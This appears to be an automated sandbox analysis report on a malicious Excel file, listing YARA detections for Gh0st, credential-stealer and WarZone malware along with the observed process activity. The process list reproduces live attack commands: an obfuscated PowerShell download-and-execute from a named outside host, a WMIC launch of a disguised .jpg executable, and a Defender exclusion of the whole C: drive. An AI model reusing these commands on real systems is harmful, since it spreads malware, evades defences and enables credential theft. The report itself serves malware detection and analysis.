        Source: 00000013.00000002.939727802.000000000054F000.00000040.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000013.00000003.785647201.000000000062C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000013.00000001.781400247.000000000054F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 00000012.00000002.783515823.0000000002C2F000.00000040.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 00000012.00000003.780359821.00000000006E6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: C:\Users\user\Desktop\DCC40000, type: DROPPEDMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
        Source: C:\Users\user\AppData\Local\Temp\Test1.txt, type: DROPPEDMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: C:\Users\user\AppData\Local\Temp\Test1.txt, type: DROPPEDMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg, type: DROPPEDMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg, type: DROPPEDMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 18.0.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 18.0.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 18.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 18.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 19.2.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 19.2.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 18.2.Test3.jpg.2ae0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 18.2.Test3.jpg.2ae0000.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 19.0.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 19.0.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 19.1.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 19.1.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: Test3.jpg.15.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: classification engine | Classification label: mal100.phis.troj.spyw.expl.evad.winXLS@25/31@1/2
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | File created: C:\Program Files\Microsoft DN1
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5468:120:WilError_01
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5460:120:WilError_01
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5900:120:WilError_01
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{BC933150-BEEB-49D8-8D1E-23D6DFF39532} - OProcSessId.dat
        Source: Telex06012020.xls | OLE indicator, Workbook stream: true
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: Test3.jpg, 00000013.00000003.926400265.00000000009E0000.00000040.00000001.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
        Source: Test3.jpg, 00000013.00000003.926400265.00000000009E0000.00000040.00000001.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
        Source: Test3.jpg, 00000013.00000003.926400265.00000000009E0000.00000040.00000001.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
        Source: Test3.jpg, 00000013.00000003.926400265.00000000009E0000.00000040.00000001.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
        Source: Test3.jpg, 00000013.00000003.926400265.00000000009E0000.00000040.00000001.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
        Source: Test3.jpg, 00000013.00000003.926400265.00000000009E0000.00000040.00000001.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
        Source: Test3.jpg, 00000013.00000003.926400265.00000000009E0000.00000040.00000001.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
        Source: Telex06012020.xls | Virustotal: Detection: 12%
        Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
        Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe CmD.Exe /C poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))
        Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))
        Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline'
        Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES578D.tmp' 'c:\Users\user\AppData\Local\Temp\mvqape5o\CSCDBDF9420C89B4C89B070DDF57D28F899.TMP'
        Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c COpY /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg
        Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c Wmic PROcEss CALl creaTe %TEMP%\Test3.jpg
        Source: unknown | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe Wmic PROcEss CALl creaTe C:\Users\user\AppData\Local\Temp\Test3.jpg
        Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\Test3.jpg C:\Users\user\AppData\Local\Temp\Test3.jpg
        Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\Test3.jpg C:\Users\user\AppData\Local\Temp\Test3.jpg
        Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
        Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
        Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\cmd.exe CmD.Exe /C poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline'
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c COpY /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c Wmic PROcEss CALl creaTe %TEMP%\Test3.jpg
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES578D.tmp' 'c:\Users\user\AppData\Local\Temp\mvqape5o\CSCDBDF9420C89B4C89B070DDF57D28F899.TMP'
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe Wmic PROcEss CALl creaTe C:\Users\user\AppData\Local\Temp\Test3.jpg
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Process created: C:\Users\user\AppData\Local\Temp\Test3.jpg C:\Users\user\AppData\Local\Temp\Test3.jpg
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
        Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | File written: C:\Program Files\Microsoft DN1\rdpwrap.ini
        Source: Window Recorder | Window detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Directory created: C:\Program Files\Microsoft DN1
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Directory created: C:\Program Files\Microsoft DN1\sqlmap.dll
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Directory created: C:\Program Files\Microsoft DN1\rdpwrap.ini
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
